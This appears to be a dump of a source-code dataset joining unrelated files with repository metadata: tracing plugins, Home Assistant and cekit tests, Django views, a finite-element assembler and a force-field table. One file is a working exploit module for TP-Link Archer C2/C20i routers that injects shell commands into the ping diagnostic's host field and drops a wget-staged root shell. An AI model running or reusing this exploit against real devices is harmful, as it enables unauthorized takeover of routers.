assert "About to execute '/usr/bin/brew call --python buildContainer --kwargs {'src': 'git://somehost.com/containers/somerepo#3b9283cb26b35511517ff5c0c3e11f490cba8feb', 'target': 'branch-containers-candidate', 'opts': {'scratch': True, 'git_branch': 'branch', 'yum_repourls': []}}'." in caplog.text
def test_osbs_builder_with_koji_target_in_descriptor(tmpdir, mocker, caplog):
mocker.patch('cekit.tools.decision', return_value=True)
mocker.patch('cekit.descriptor.resource.urlopen')
mocker.patch.object(subprocess, 'call')
mocker.patch.object(subprocess, 'check_call')
tmpdir.mkdir('osbs').mkdir('repo').mkdir(
'.git').join('other').write_text(u'Some content', 'utf8')
descriptor = image_descriptor.copy()
descriptor['osbs']['koji_target'] = 'some-target'
run_osbs(descriptor, str(tmpdir), mocker)
assert "About to execute '/usr/bin/brew call --python buildContainer --kwargs {'src': 'git://somehost.com/containers/somerepo#3b9283cb26b35511517ff5c0c3e11f490cba8feb', 'target': 'some-target', 'opts': {'scratch': True, 'git_branch': 'branch', 'yum_repourls': []}}'." in caplog.text
def test_osbs_builder_with_fetch_artifacts_file_creation(tmpdir, mocker, caplog):
"""
    Checks whether the fetch-artifacts-url.yaml file is generated.
"""
caplog.set_level(logging.DEBUG, logger="cekit")
mocker.patch('cekit.tools.decision', return_value=True)
mocker.patch('cekit.descriptor.resource.urlopen')
mocker.patch('cekit.generator.osbs.get_brew_url', return_value='http://random.url/path')
mocker.patch.object(subprocess, 'check_output')
mocker.patch('cekit.builders.osbs.DistGit.push')
tmpdir.mkdir('osbs').mkdir('repo')
tmpdir.join('osbs').join('repo').join(
'fetch-artifacts-url.yaml').write_text(u'Some content', 'utf8')
with Chdir(os.path.join(str(tmpdir), 'osbs', 'repo')):
subprocess.call(["git", "init"])
subprocess.call(["git", "add", "fetch-artifacts-url.yaml"])
subprocess.call(["git", "commit", "-m", "Dummy"])
descriptor = image_descriptor.copy()
descriptor['artifacts'] = [
{'name': 'artifact_name', 'md5': '123456'}
]
run_osbs(descriptor, str(tmpdir), mocker)
with open(os.path.join(str(tmpdir), 'target', 'image', 'fetch-artifacts-url.yaml'), 'r') as _file:
fetch_artifacts = yaml.safe_load(_file)
assert len(fetch_artifacts) == 1
assert fetch_artifacts[0] == {'md5': '123456',
'target': 'artifact_name', 'url': 'http://random.url/path'}
assert "Artifact 'artifact_name' added to fetch-artifacts-url.yaml" in caplog.text
def test_osbs_builder_with_fetch_artifacts_file_removal(tmpdir, mocker, caplog):
"""
Checks whether the fetch-artifacts-url.yaml file is removed if exists
and is not used anymore.
https://github.com/cekit/cekit/issues/629
"""
caplog.set_level(logging.DEBUG, logger="cekit")
mocker.patch('cekit.tools.decision', return_value=True)
mocker.patch('cekit.descriptor.resource.urlopen')
mocker.patch('cekit.generator.osbs.get_brew_url', return_value='http://random.url/path')
mocker.patch.object(subprocess, 'check_output')
mocker.patch('cekit.builders.osbs.DistGit.push')
tmpdir.mkdir('osbs').mkdir('repo')
tmpdir.join('osbs').join('repo').join(
'fetch-artifacts-url.yaml').write_text(u'Some content', 'utf8')
with Chdir(os.path.join(str(tmpdir), 'osbs', 'repo')):
subprocess.call(["git", "init"])
subprocess.call(["git", "add", "fetch-artifacts-url.yaml"])
subprocess.call(["git", "commit", "-m", "Dummy"])
run_osbs(image_descriptor, str(tmpdir), mocker)
assert not os.path.exists(os.path.join(str(tmpdir), 'osbs', 'repo', 'fetch-artifacts-url.yaml'))
assert "Removing old 'fetch-artifacts-url.yaml' file" in caplog.text
| 36.353053
| 302
| 0.665914
|
66d138ec3e9d5275e449721b358aeb13b90600e2
| 2,398
|
py
|
Python
|
skywalking/plugins/sw_urllib_request.py
|
Shikugawa/skywalking-python
|
49e5cdf3572be8c52dbf155db4d221d271b578c2
|
[
"Apache-2.0"
] | null | null | null |
skywalking/plugins/sw_urllib_request.py
|
Shikugawa/skywalking-python
|
49e5cdf3572be8c52dbf155db4d221d271b578c2
|
[
"Apache-2.0"
] | null | null | null |
skywalking/plugins/sw_urllib_request.py
|
Shikugawa/skywalking-python
|
49e5cdf3572be8c52dbf155db4d221d271b578c2
|
[
"Apache-2.0"
] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from urllib.request import Request
from skywalking import Layer, Component
from skywalking.trace import tags
from skywalking.trace.context import get_context
from skywalking.trace.tags import Tag
def install():
import socket
from urllib.request import OpenerDirector
from urllib.error import HTTPError
_open = OpenerDirector.open
def _sw_open(this: OpenerDirector, fullurl, data=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
if isinstance(fullurl, str):
fullurl = Request(fullurl, data)
context = get_context()
url = fullurl.selector.split("?")[0] if fullurl.selector else '/'
with context.new_exit_span(op=url, peer=fullurl.host) as span:
carrier = span.inject()
span.layer = Layer.Http
span.component = Component.General
code = None
            for item in carrier:
                fullurl.add_header(item.key, item.val)
try:
res = _open(this, fullurl, data, timeout)
code = res.code
except HTTPError as e:
code = e.code
raise
finally: # we do this here because it may change in _open()
span.tag(Tag(key=tags.HttpMethod, val=fullurl.get_method()))
span.tag(Tag(key=tags.HttpUrl, val=fullurl.full_url))
if code is not None:
span.tag(Tag(key=tags.HttpStatus, val=code, overridable=True))
if code >= 400:
span.error_occurred = True
return res
OpenerDirector.open = _sw_open
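# Hedged usage sketch (not part of this plugin): modules like this one are normally
# installed by the SkyWalking Python agent at startup rather than imported directly.
# Roughly, and with the exact configuration parameter names treated as assumptions
# that may differ between agent versions:
#
#   from skywalking import agent, config
#   config.init(...)                    # point the agent at an OAP collector
#   agent.start()                       # invokes each plugin's install()
#
#   from urllib.request import urlopen
#   urlopen('http://example.com/')      # this request is now traced by _sw_open above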
| 36.333333
| 99
| 0.660967
|
9046434d7ada39a6d93b568301729cc00d1397ee
| 3,264
|
py
|
Python
|
maza/modules/exploits/routers/tplink/archer_c2_c20i_rce.py
|
ArturSpirin/maza
|
56ae6325c08bcedd22c57b9fe11b58f1b38314ca
|
[
"MIT"
] | 2
|
2020-02-06T20:24:31.000Z
|
2022-03-08T19:07:16.000Z
|
maza/modules/exploits/routers/tplink/archer_c2_c20i_rce.py
|
ArturSpirin/maza
|
56ae6325c08bcedd22c57b9fe11b58f1b38314ca
|
[
"MIT"
] | null | null | null |
maza/modules/exploits/routers/tplink/archer_c2_c20i_rce.py
|
ArturSpirin/maza
|
56ae6325c08bcedd22c57b9fe11b58f1b38314ca
|
[
"MIT"
] | null | null | null |
import time
from maza.core.exploit import *
from maza.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "TP-Link Archer C2 & C20i",
"description": "Exploits TP-Link Archer C2 and Archer C20i remote code execution vulnerability "
"that allows executing commands on operating system level with root privileges.",
"authors": (
"Michal Sajdak <michal.sajdak[at]securitum.pl", # vulnerability discovery
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
"references": (
"http://sekurak.pl/tp-link-root-bez-uwierzytelnienia-urzadzenia-archer-c20i-oraz-c2/", # only in polish
),
"devices": (
"TP-Link Archer C2",
"TP-Link Archer C20i",
),
}
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(80, "Target HTTP port")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command shell")
print_status("It is blind command injection so response is not available")
# requires testing
shell(self, architecture="mipsbe", method="wget", location="/tmp")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def execute(self, cmd):
referer = "{}/mainFrame.htm".format(self.target)
headers = {
"Content-Type": "text/plain",
"Referer": referer
}
data = ("[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\r\n"
"dataBlockSize=64\r\n"
"timeout=1\r\n"
"numberOfRepetitions=1\r\n"
"host=127.0.0.1;" + cmd + ";\r\n"
"X_TP_ConnName=ewan_ipoe_s\r\n"
"diagnosticsState=Requested\r\n")
# send command
self.http_request(
method="POST",
path="/cgi?2",
headers=headers,
data=data
)
data = ("[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n")
# execute command on device
self.http_request(
method="POST",
path="/cgi?7",
headers=headers,
data=data
)
time.sleep(1)
return ""
@mute
def check(self):
referer = self.get_target_url(path="/mainFrame.htm")
headers = {
"Content-Type": "text/plain",
"Referer": referer
}
data = (
"[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\r\n"
"dataBlockSize=64\r\n"
"timeout=1\r\n"
"numberOfRepetitions=1\r\n"
"host=127.0.0.1\r\n"
"X_TP_ConnName=ewan_ipoe_s\r\n"
"diagnosticsState=Requested\r\n"
)
response = self.http_request(
method="POST",
path="/cgi?2",
headers=headers,
data=data
)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and "[error]0" in response.text:
return True # target is vulnerable
return False # target is not vulnerable
| 30.792453
| 116
| 0.531863
|
34afd19310fd4a206f92e1e972abe21243788f44
| 4,046
|
py
|
Python
|
tests/components/homematicip_cloud/test_hap.py
|
petewill/home-assistant
|
5859dba4344f05fb8774aa1207e47ac28f627a67
|
[
"Apache-2.0"
] | 3
|
2020-01-21T18:09:09.000Z
|
2022-01-17T08:06:03.000Z
|
tests/components/homematicip_cloud/test_hap.py
|
petewill/home-assistant
|
5859dba4344f05fb8774aa1207e47ac28f627a67
|
[
"Apache-2.0"
] | 39
|
2016-12-16T12:40:34.000Z
|
2017-02-13T17:53:42.000Z
|
tests/components/homematicip_cloud/test_hap.py
|
petewill/home-assistant
|
5859dba4344f05fb8774aa1207e47ac28f627a67
|
[
"Apache-2.0"
] | 3
|
2020-01-11T15:44:13.000Z
|
2022-01-17T08:06:09.000Z
|
"""Test HomematicIP Cloud accesspoint."""
from unittest.mock import Mock, patch
import pytest
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.components.homematicip_cloud import hap as hmipc
from homeassistant.components.homematicip_cloud import const, errors
from tests.common import mock_coro, mock_coro_func
async def test_auth_setup(hass):
"""Test auth setup for client registration."""
config = {
const.HMIPC_HAPID: "ABC123",
const.HMIPC_PIN: "123",
const.HMIPC_NAME: "hmip",
}
hap = hmipc.HomematicipAuth(hass, config)
with patch.object(hap, "get_auth", return_value=mock_coro()):
assert await hap.async_setup() is True
async def test_auth_setup_connection_error(hass):
"""Test auth setup connection error behaviour."""
config = {
const.HMIPC_HAPID: "ABC123",
const.HMIPC_PIN: "123",
const.HMIPC_NAME: "hmip",
}
hap = hmipc.HomematicipAuth(hass, config)
with patch.object(hap, "get_auth", side_effect=errors.HmipcConnectionError):
assert await hap.async_setup() is False
async def test_auth_auth_check_and_register(hass):
"""Test auth client registration."""
config = {
const.HMIPC_HAPID: "ABC123",
const.HMIPC_PIN: "123",
const.HMIPC_NAME: "hmip",
}
hap = hmipc.HomematicipAuth(hass, config)
hap.auth = Mock()
with patch.object(
hap.auth, "isRequestAcknowledged", return_value=mock_coro(True)
), patch.object(
hap.auth, "requestAuthToken", return_value=mock_coro("ABC")
), patch.object(
hap.auth, "confirmAuthToken", return_value=mock_coro()
):
assert await hap.async_checkbutton() is True
assert await hap.async_register() == "ABC"
async def test_hap_setup_works(aioclient_mock):
"""Test a successful setup of a accesspoint."""
hass = Mock()
entry = Mock()
home = Mock()
entry.data = {
hmipc.HMIPC_HAPID: "ABC123",
hmipc.HMIPC_AUTHTOKEN: "123",
hmipc.HMIPC_NAME: "hmip",
}
hap = hmipc.HomematicipHAP(hass, entry)
with patch.object(hap, "get_hap", return_value=mock_coro(home)):
assert await hap.async_setup() is True
assert hap.home is home
assert len(hass.config_entries.async_forward_entry_setup.mock_calls) == 8
assert hass.config_entries.async_forward_entry_setup.mock_calls[0][1] == (
entry,
"alarm_control_panel",
)
assert hass.config_entries.async_forward_entry_setup.mock_calls[1][1] == (
entry,
"binary_sensor",
)
async def test_hap_setup_connection_error():
"""Test a failed accesspoint setup."""
hass = Mock()
entry = Mock()
entry.data = {
hmipc.HMIPC_HAPID: "ABC123",
hmipc.HMIPC_AUTHTOKEN: "123",
hmipc.HMIPC_NAME: "hmip",
}
hap = hmipc.HomematicipHAP(hass, entry)
with patch.object(
hap, "get_hap", side_effect=errors.HmipcConnectionError
), pytest.raises(ConfigEntryNotReady):
await hap.async_setup()
assert len(hass.async_add_job.mock_calls) == 0
assert len(hass.config_entries.flow.async_init.mock_calls) == 0
async def test_hap_reset_unloads_entry_if_setup():
"""Test calling reset while the entry has been setup."""
hass = Mock()
entry = Mock()
home = Mock()
home.disable_events = mock_coro_func()
entry.data = {
hmipc.HMIPC_HAPID: "ABC123",
hmipc.HMIPC_AUTHTOKEN: "123",
hmipc.HMIPC_NAME: "hmip",
}
hap = hmipc.HomematicipHAP(hass, entry)
with patch.object(hap, "get_hap", return_value=mock_coro(home)):
assert await hap.async_setup() is True
assert hap.home is home
assert len(hass.services.async_register.mock_calls) == 0
assert len(hass.config_entries.async_forward_entry_setup.mock_calls) == 8
hass.config_entries.async_forward_entry_unload.return_value = mock_coro(True)
await hap.async_reset()
assert len(hass.config_entries.async_forward_entry_unload.mock_calls) == 8
| 32.629032
| 81
| 0.681167
|
fb0d7fb79c0bbb54318ea5c44bfcf7b3db23a62c
| 434
|
py
|
Python
|
redirink/links/tests/conftest.py
|
Egor4ik325/redirink
|
17ef85f48145ee6112f2fcbab60dcd9d65ba78bf
|
[
"MIT"
] | null | null | null |
redirink/links/tests/conftest.py
|
Egor4ik325/redirink
|
17ef85f48145ee6112f2fcbab60dcd9d65ba78bf
|
[
"MIT"
] | null | null | null |
redirink/links/tests/conftest.py
|
Egor4ik325/redirink
|
17ef85f48145ee6112f2fcbab60dcd9d65ba78bf
|
[
"MIT"
] | 1
|
2021-12-31T00:46:31.000Z
|
2021-12-31T00:46:31.000Z
|
import factory
import pytest
from redirink.links.tests.factories import LinkFactory
@pytest.fixture
def link_dict():
"""Return the dictionary of all model fields with the actual values not serial values."""
return factory.build(dict, FACTORY_CLASS=LinkFactory)
@pytest.fixture
def link_data(link_dict):
"""Data for creating link as in request.data."""
data = link_dict.copy()
del data["user"]
return data
| 22.842105
| 93
| 0.735023
|
7ac2e6c22490ee815a257fa12933a5caf6d3c0b9
| 1,658
|
py
|
Python
|
iaso/views.py
|
BLSQ/iaso-copy
|
85fb17f408c15e8c2d730416d1312f58f8db39b7
|
[
"MIT"
] | null | null | null |
iaso/views.py
|
BLSQ/iaso-copy
|
85fb17f408c15e8c2d730416d1312f58f8db39b7
|
[
"MIT"
] | null | null | null |
iaso/views.py
|
BLSQ/iaso-copy
|
85fb17f408c15e8c2d730416d1312f58f8db39b7
|
[
"MIT"
] | 1
|
2022-03-23T16:44:12.000Z
|
2022-03-23T16:44:12.000Z
|
from django.shortcuts import get_object_or_404, render, resolve_url
from django.contrib.auth.views import redirect_to_login
from django.http import HttpResponse, JsonResponse
from django.conf import settings
from iaso.models import Page, Account, TEXT, IFRAME
from hat.__version__ import DEPLOYED_ON, DEPLOYED_BY, VERSION
def page(request, page_slug):
page = get_object_or_404(Page, slug=page_slug)
path = request.get_full_path()
resolved_login_url = resolve_url(settings.LOGIN_URL)
if page.needs_authentication and ((not request.user.is_authenticated) or (request.user not in page.users.all())):
return redirect_to_login(path, resolved_login_url, "next")
if page.type == IFRAME:
return render(request, "iaso/pages/iframe.html", {"src": page.content, "title": page.name})
if page.type == TEXT:
return render(request, "iaso/pages/text.html", {"text": page.content, "title": page.name})
return HttpResponse(page.content)
def health(request):
"""This is used by aws health check to verify the environment is up
it just looks at the 200 status code and not at the content.
"""
res = {
"up": "ok",
"env": settings.ENVIRONMENT,
"database": settings.DATABASES["default"]["NAME"],
"DEPLOYED_ON": DEPLOYED_ON,
"DEPLOYED_BY": DEPLOYED_BY,
"VERSION": VERSION,
}
# noinspection PyBroadException
try:
# mostly to check we can connect to the db
res["account_count"] = Account.objects.count()
    except Exception:
res["error"] = "db_fail"
return JsonResponse(res)
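# Hedged illustration (all values below are placeholders, not real deployment data):
# a healthy instance answers with a 200 response shaped roughly like
#   {"up": "ok", "env": "...", "database": "...", "DEPLOYED_ON": "...",
#    "DEPLOYED_BY": "...", "VERSION": "...", "account_count": 42}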
| 35.276596
| 117
| 0.69421
|
fae27094774bc243274a88087e74b242a3bc567d
| 4,565
|
py
|
Python
|
FE_code/assembler.py
|
leolapidus/Concrete_Design_Tool
|
7553f50d3db05e3a6c290e35acdc5d8bd1c51130
|
[
"BSD-4-Clause"
] | 1
|
2019-06-12T13:23:28.000Z
|
2019-06-12T13:23:28.000Z
|
FE_code/assembler.py
|
leolapidus/Concrete_Design_Tool
|
7553f50d3db05e3a6c290e35acdc5d8bd1c51130
|
[
"BSD-4-Clause"
] | null | null | null |
FE_code/assembler.py
|
leolapidus/Concrete_Design_Tool
|
7553f50d3db05e3a6c290e35acdc5d8bd1c51130
|
[
"BSD-4-Clause"
] | null | null | null |
"""This module only contains the Assembler class.
"""
class Assembler(object):
"""An Assembler helps to generate system matrices/vectors from elements.
Attributes
----------
dofs : list
        List of all dofs in the system. The dofs with Dirichlet constraints are at the end.
dof_indices : dict
Dictionary containing the index of each dof. The index is equal to the position of the dof
in the dofs-list.
dof_count : int
Total number of dofs.
free_dof_count : int
        Number of dofs without Dirichlet constraints.
    fixed_dof_count : int
        Number of dofs with Dirichlet constraints.
    element_freedom_table : list
        List with tuples containing the elements and the corresponding dof indices.
"""
def __init__(self, model):
"""Create a new Assembler
Parameters
----------
model : Model
Model to assemble.
"""
# --- dof indices
processed_dofs = set()
free_dofs = list()
fixed_dofs = list()
for element in model.elements:
for dof in element.dofs:
if dof in processed_dofs:
continue
else:
processed_dofs.add(dof)
if dof in model.dirichlet_conditions:
fixed_dofs.append(dof)
else:
free_dofs.append(dof)
dofs = free_dofs + fixed_dofs
dof_indices = {dof: index for index, dof in enumerate(dofs)}
# --- element freedom table
element_freedom_table = list()
for element in model.elements:
indices = [dof_indices[dof] for dof in element.dofs]
element_freedom_table.append((element, indices))
# --- store
self.dofs = dofs
self.dof_indices = dof_indices
self.dof_count = len(dofs)
self.free_dof_count = len(free_dofs)
self.fixed_dof_count = len(fixed_dofs)
self.element_freedom_table = element_freedom_table
def index_of_dof(self, dof):
"""Get the index of the given dof.
Parameters
----------
dof : object
Dof at the index.
Returns
-------
index : int
Index of the given dof.
"""
return self.dof_indices[dof]
def dof_at_index(self, index):
"""Get the dof at the given index.
Parameters
----------
index : int
Index of the dof.
Returns
-------
dof : object
Dof at the given index.
"""
return self.dofs[index]
@property
def free_dofs(self):
"""Get a list with the unconstrained dofs
Returns
-------
free_dofs : list
List with the unconstrained dofs
"""
return self.dofs[:self.free_dof_count]
def assemble_matrix(self, system_matrix, calculate_element_matrix):
"""Assemble element matrices into a system matrix.
Parameters
----------
system_matrix : ndarray
System matrix to store the results. The results are added to the existing values.
calculate_element_matrix : function Element -> ndarray
Function to calculate the element matrix.
"""
for element, indices in self.element_freedom_table:
element_matrix = calculate_element_matrix(element)
if element_matrix is None:
continue
for element_row, system_row in enumerate(indices):
for element_col, system_col in enumerate(indices):
value = element_matrix[element_row, element_col]
system_matrix[system_row, system_col] += value
def assemble_vector(self, system_vector, calculate_element_vector):
"""Assemble element vectors into a system vector.
Parameters
----------
system_vector : ndarray
System vector to store the results. The results are added to the existing values.
calculate_element_vector : function Element -> ndarray
Function to calculate the element vector.
"""
for element, indices in self.element_freedom_table:
element_vector = calculate_element_vector(element)
if element_vector is None:
continue
for element_row, system_row in enumerate(indices):
system_vector[system_row] += element_vector[element_row]
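# Hedged usage sketch (illustration only, not part of this module): with a `model`
# from the surrounding FE_code package already populated with elements and Dirichlet
# conditions, assembling a global matrix typically looks like
#
#   import numpy as np
#   assembler = Assembler(model)
#   k = np.zeros((assembler.dof_count, assembler.dof_count))
#   assembler.assemble_matrix(k, lambda element: element.calculate_stiffness_matrix())
#
# `calculate_stiffness_matrix` is an assumed element method name used purely for
# illustration; any callable mapping an element to an ndarray (or None) will do.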
| 28.354037
| 98
| 0.583133
|
179fbb4c3310c8b0842511224bbf7254c01f4a1c
| 143,172
|
py
|
Python
|
renormalizer/tests/c2h4_para.py
|
shuaigroup/Renormalizer
|
963d52efdaa247320e781a96b64d41c9cadf6f0e
|
[
"Apache-2.0"
] | 27
|
2019-09-02T08:35:01.000Z
|
2022-02-22T08:18:02.000Z
|
renormalizer/tests/c2h4_para.py
|
shuaigroup/Renormalizer
|
963d52efdaa247320e781a96b64d41c9cadf6f0e
|
[
"Apache-2.0"
] | 54
|
2019-08-30T12:18:39.000Z
|
2022-03-20T13:23:07.000Z
|
renormalizer/tests/c2h4_para.py
|
shuaigroup/Renormalizer
|
963d52efdaa247320e781a96b64d41c9cadf6f0e
|
[
"Apache-2.0"
] | 6
|
2019-09-10T03:25:28.000Z
|
2021-11-20T18:41:58.000Z
|
omega_std = [824.968669, 950.188990, 966.387896, 1050.809275, 1246.763896,
1369.382703, 1478.480613, 1672.569007, 3140.914743, 3156.837275,
3222.891944, 3248.709300]
ff = [
[0,0 , 1.41288301794e-05],
[0,0,0,0 , 2.22492076101e-08],
[0,0,0,0,0,0 , -3.10551186628e-11],
[0,0,0,0,0,11 , -7.26291340977e-13],
[0,0,0,0,1,1 , -6.12553875342e-12],
[0,0,0,0,2,2 , -6.30224606552e-12],
[0,0,0,0,3,3 , -6.44487341672e-12],
[0,0,0,0,4,4 , -2.12875437546e-11],
[0,0,0,0,4,10 , 3.52687388745e-12],
[0,0,0,0,5 , -9.39984494208e-11],
[0,0,0,0,5,5 , -1.10206835151e-11],
[0,0,0,0,5,7 , 1.45254612482e-11],
[0,0,0,0,5,9 , -2.20078106393e-13],
[0,0,0,0,6,6 , -3.04592811113e-11],
[0,0,0,0,6,8 , 4.47851017301e-12],
[0,0,0,0,7 , -6.48717324093e-11],
[0,0,0,0,7,7 , -1.69493253641e-11],
[0,0,0,0,7,9 , -5.05360934554e-12],
[0,0,0,0,8,8 , 4.97730111499e-11],
[0,0,0,0,9 , 1.11265638717e-09],
[0,0,0,0,9,9 , 5.21263773641e-11],
[0,0,0,0,10,10 , 5.46502281134e-11],
[0,0,0,0,11,11 , 5.5197505969e-11],
[0,0,0,1,1,11 , 5.01686194045e-13],
[0,0,0,1,2,4 , 5.04413100802e-12],
[0,0,0,1,2,10 , -1.27005736013e-13],
[0,0,0,1,3 , 3.83674669227e-11],
[0,0,0,1,3,5 , -4.05001368788e-12],
[0,0,0,1,3,7 , 4.32698056225e-12],
[0,0,0,1,3,9 , 1.70726509009e-12],
[0,0,0,2,2,11 , -6.28147158272e-13],
[0,0,0,2,3,6 , 6.09047975074e-12],
[0,0,0,2,3,8 , -1.07846679749e-12],
[0,0,0,3,3,11 , 8.30894105488e-13],
[0,0,0,4,4,11 , 4.36710591606e-12],
[0,0,0,4,5,6 , -1.59086300774e-11],
[0,0,0,4,5,8 , 2.64240532027e-12],
[0,0,0,4,6 , 1.15809066702e-10],
[0,0,0,4,6,7 , 1.83727722139e-11],
[0,0,0,4,6,9 , 6.05100806234e-12],
[0,0,0,4,7,8 , -5.52726674843e-12],
[0,0,0,4,8 , 8.58095563644e-10],
[0,0,0,4,8,9 , 4.4388490067e-11],
[0,0,0,4,10,11 , 4.81058248874e-11],
[0,0,0,5,5,11 , -4.81698201706e-12],
[0,0,0,5,6,10 , -2.6557387901e-12],
[0,0,0,5,7,11 , 1.84753953056e-12],
[0,0,0,5,8,10 , 3.39759275242e-11],
[0,0,0,5,9,11 , 3.5885978756e-11],
[0,0,0,5,11 , 7.01638175953e-10],
[0,0,0,6,6,11 , -2.44774767926e-12],
[0,0,0,6,7,10 , -3.43273973467e-13],
[0,0,0,6,8,11 , 5.37860739883e-11],
[0,0,0,6,9,10 , 5.50423736313e-11],
[0,0,0,6,10 , 1.05740655704e-09],
[0,0,0,7,7,11 , 1.19487751661e-12],
[0,0,0,7,8,10 , -4.06038814786e-11],
[0,0,0,7,9,11 , -4.12283979314e-11],
[0,0,0,7,11 , -8.03242112835e-10],
[0,0,0,8,8,11 , -7.32527653147e-12],
[0,0,0,8,9,10 , -8.52799650223e-12],
[0,0,0,8,10 , -9.39341349794e-11],
[0,0,0,9,9,11 , -9.2445497443e-12],
[0,0,0,9,11 , -1.23329441012e-10],
[0,0,0,10,10,11 , 6.92834140918e-12],
[0,0,0,11 , -1.48238983012e-09],
[0,0,0,11,11,11 , 7.39043557548e-12],
[0,0,1,1 , 4.74913930966e-09],
[0,0,1,1,1,1 , -6.72661525461e-12],
[0,0,1,1,2,2 , -6.36141601168e-12],
[0,0,1,1,3,3 , -5.34181839976e-12],
[0,0,1,1,4,4 , -4.35598889942e-12],
[0,0,1,1,4,10 , 7.39254386686e-13],
[0,0,1,1,5 , 6.61221888288e-12],
[0,0,1,1,5,5 , -2.67656396466e-12],
[0,0,1,1,5,7 , 2.82902834437e-12],
[0,0,1,1,5,9 , 2.80621626601e-13],
[0,0,1,1,6,6 , -6.53587003626e-12],
[0,0,1,1,6,8 , 2.96664826642e-13],
[0,0,1,1,7 , -1.25634943601e-11],
[0,0,1,1,7,7 , -3.44232141935e-12],
[0,0,1,1,7,9 , -1.09685319073e-12],
[0,0,1,1,8,8 , 1.72640479111e-11],
[0,0,1,1,9 , 3.36942708276e-10],
[0,0,1,1,9,9 , 1.67552060212e-11],
[0,0,1,1,10,10 , 2.00990960848e-11],
[0,0,1,1,11,11 , 1.8729696297e-11],
[0,0,1,2,4,11 , -5.65033485027e-13],
[0,0,1,2,5,6 , 3.85907658337e-12],
[0,0,1,2,5,8 , 3.17983714874e-13],
[0,0,1,2,6 , 1.14285549062e-11],
[0,0,1,2,6,7 , -4.61720134476e-12],
[0,0,1,2,6,9 , -2.15740985603e-13],
[0,0,1,2,7,8 , 7.70497729403e-13],
[0,0,1,2,8 , -3.49236055932e-10],
[0,0,1,2,8,9 , -1.79905104723e-11],
[0,0,1,2,10,11 , -2.0187060732e-11],
[0,0,1,3,4,6 , -4.96617531001e-12],
[0,0,1,3,4,8 , 1.42283282027e-12],
[0,0,1,3,5,11 , -1.45178495677e-13],
[0,0,1,3,6,10 , -1.62005947233e-13],
[0,0,1,3,7,11 , -5.79013596251e-13],
[0,0,1,3,8,10 , 1.79831216488e-11],
[0,0,1,3,9,11 , 1.75506254085e-11],
[0,0,1,3,11 , 3.31842051368e-10],
[0,0,2,2 , 5.82442838338e-09],
[0,0,2,2,2,2 , -7.54501216235e-12],
[0,0,2,2,3,3 , -5.77194043628e-12],
[0,0,2,2,4,4 , -4.56850688475e-12],
[0,0,2,2,4,10 , 5.07109465983e-13],
[0,0,2,2,5 , -2.81958688005e-11],
[0,0,2,2,5,5 , -2.57988886227e-12],
[0,0,2,2,5,7 , 3.14045460755e-12],
[0,0,2,2,5,9 , -6.82506862895e-13],
[0,0,2,2,6,6 , -6.14777411623e-12],
[0,0,2,2,6,8 , -9.88655318975e-14],
[0,0,2,2,7 , 7.06789131296e-12],
[0,0,2,2,7,7 , -3.74059554917e-12],
[0,0,2,2,7,9 , -4.93826277389e-13],
[0,0,2,2,8,8 , 1.84337173371e-11],
[0,0,2,2,9 , 3.6718818237e-10],
[0,0,2,2,9,9 , 1.81961937705e-11],
[0,0,2,2,10,10 , 2.01880693781e-11],
[0,0,2,2,11,11 , 2.08085722878e-11],
[0,0,2,3,4 , -3.02695308086e-11],
[0,0,2,3,4,5 , 3.35722854318e-12],
[0,0,2,3,4,7 , -3.78386322449e-12],
[0,0,2,3,4,9 , -1.58655754186e-12],
[0,0,2,3,5,10 , 4.02755469891e-13],
[0,0,2,3,6,11 , 2.79365159093e-13],
[0,0,2,3,7,10 , 3.65932985232e-13],
[0,0,2,3,8,11 , -1.83521616378e-11],
[0,0,2,3,9,10 , -1.83039347903e-11],
[0,0,2,3,10 , -3.52400991543e-10],
[0,0,3,3 , 4.39819295325e-09],
[0,0,3,3,3,3 , -4.90227760259e-12],
[0,0,3,3,4,4 , -4.56082218217e-12],
[0,0,3,3,4,10 , 8.60051487095e-13],
[0,0,3,3,5 , 3.1690901593e-11],
[0,0,3,3,5,5 , -2.69586905098e-12],
[0,0,3,3,5,7 , 2.59722888925e-12],
[0,0,3,3,5,9 , 8.79625206016e-13],
[0,0,3,3,6,6 , -5.31400911966e-12],
[0,0,3,3,6,8 , 1.02524201815e-12],
[0,0,3,3,7 , -2.10003237607e-11],
[0,0,3,3,7,7 , -3.11984751886e-12],
[0,0,3,3,7,9 , -1.39867587616e-12],
[0,0,3,3,8,8 , 1.6516200446e-11],
[0,0,3,3,9 , 3.16170522604e-10],
[0,0,3,3,9,9 , 1.57976030212e-11],
[0,0,3,3,10,10 , 1.71640155278e-11],
[0,0,3,3,11,11 , 1.68956602586e-11],
[0,0,4,4 , 9.73958258014e-09],
[0,0,4,4,4,4 , -1.74387693498e-11],
[0,0,4,4,4,10 , 3.87700273422e-12],
[0,0,4,4,5 , 9.31567131051e-11],
[0,0,4,4,5,5 , -9.0059856688e-12],
[0,0,4,4,5,7 , 9.93553286755e-12],
[0,0,4,4,5,9 , 3.70324655762e-12],
[0,0,4,4,6,6 , -2.10387458481e-11],
[0,0,4,4,6,8 , 5.47637268575e-12],
[0,0,4,4,7 , -1.05366898425e-10],
[0,0,4,4,7,7 , -1.12536265229e-11],
[0,0,4,4,7,9 , -5.66572492841e-12],
[0,0,4,4,8,8 , 3.84594842328e-11],
[0,0,4,4,9 , 7.35416720189e-10],
